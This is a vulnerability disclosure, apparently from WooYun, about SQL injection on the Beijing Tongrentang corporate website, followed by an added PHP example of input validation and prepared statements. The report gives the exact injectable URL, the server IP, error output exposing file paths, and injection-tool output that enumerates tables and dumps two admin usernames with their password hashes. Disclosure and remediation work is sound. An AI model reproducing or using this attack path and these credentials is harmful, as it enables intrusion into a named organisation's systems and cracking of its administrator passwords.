SQL injection vulnerability on the official website of China's Beijing Tongrentang (Group .. Good, the market value is also 19.153 billion yuan ..
Detailed description:
http://www.tongrentang.com/trtxsqy/introduce_yc.php?Id='%60%228rk1B
Error: exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ ''\" 1' at line 1' in /data/web/trt/admin/db.php:36
Stack trace:
#0 /data/web/trt/admin/db.php(36): PDO->query('select * from...')
#1 /data/web/trt/trtxsqy/introduce_yc.php(5): db->query('select * from...')
#2 {main}
Analyzing http://www.tongrentang.com/trtxsqy/introduce_yc.php?Id='%60%228rk1B
Host IP: 211.99.194.203
Web Server: nginx
Keyword Found: Error:
I guess injection type is Integer ?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 12
Valid String Column is 2
Current DB: trt
Count (table_name) of information_schema.tables where table_schema = 0x747274 is 12
Tables found: admin, advt_swf, article, dianmian, dianmian_en, lib, positioninfotable, product, product_en, tag, user, videocategory
Count (column_name) of information_schema.columns where table_schema = 0x747274 and table_name = 0x61646D696E is 5
Columns found: id, username, password, rights, regtime
Count (*) of trt.admin is 2
Data Found: id = 1
Data Found: password = 98245d354279aa2faec79779601dd675
Data Found: username = super
Data Found: id = 2
Data Found: password = e1f1b43c56ea0e9cd9bcd5b2c2981e1e
Data Found: username = yaodian
Solution:
Filter
Author: zeracker @ wooyun
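The one-word "Filter" fix, spelled out for the pattern visible in the stack trace (a request parameter reaching PDO->query() and the exception being echoed to the client). This is an added example, not the site's code and not part of the original report: the table, column and function names are constructed, and an in-memory SQLite database stands in for the MySQL server so the script runs offline.

```php
<?php
// Added example, not the site's code. Table/column names are constructed, and
// in-memory SQLite stands in for MySQL so the script runs offline.

function open_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    // Throw on SQL errors so they can be caught and logged, not printed.
    // With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE intro (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO intro (id, title) VALUES (1, 'constructed row')");
    return $pdo;
}

// Returns [HTTP status, body]. $rawId is the untrusted query-string value.
function show_intro(PDO $pdo, $rawId): array {
    // 1. Filter: the parameter is an integer key, so accept only that.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, 'Bad request'];
    }
    try {
        // 2. Bind: use a placeholder instead of concatenating into PDO::query().
        $stmt = $pdo->prepare('SELECT title FROM intro WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // 3. Do not echo the exception: the error page in the report leaked
        //    a query fragment and file paths. Log it server-side instead.
        error_log('intro lookup failed: ' . $e->getMessage());
        return [500, 'Internal error'];
    }
    if ($row === false) {
        return [404, 'Not found'];
    }
    return [200, htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8')];
}

$pdo = open_db();
// Constructed inputs: a valid id, the malformed value from the report, a missing row.
foreach (['1', "'`\"8rk1B", '2'] as $input) {
    [$status, $body] = show_intro($pdo, $input);
    printf("%-14s -> %d %s\n", var_export($input, true), $status, $body);
}
```

Input validation alone is the weaker half of the fix; the bound placeholder is what keeps the value out of the SQL text even if a filter is later loosened.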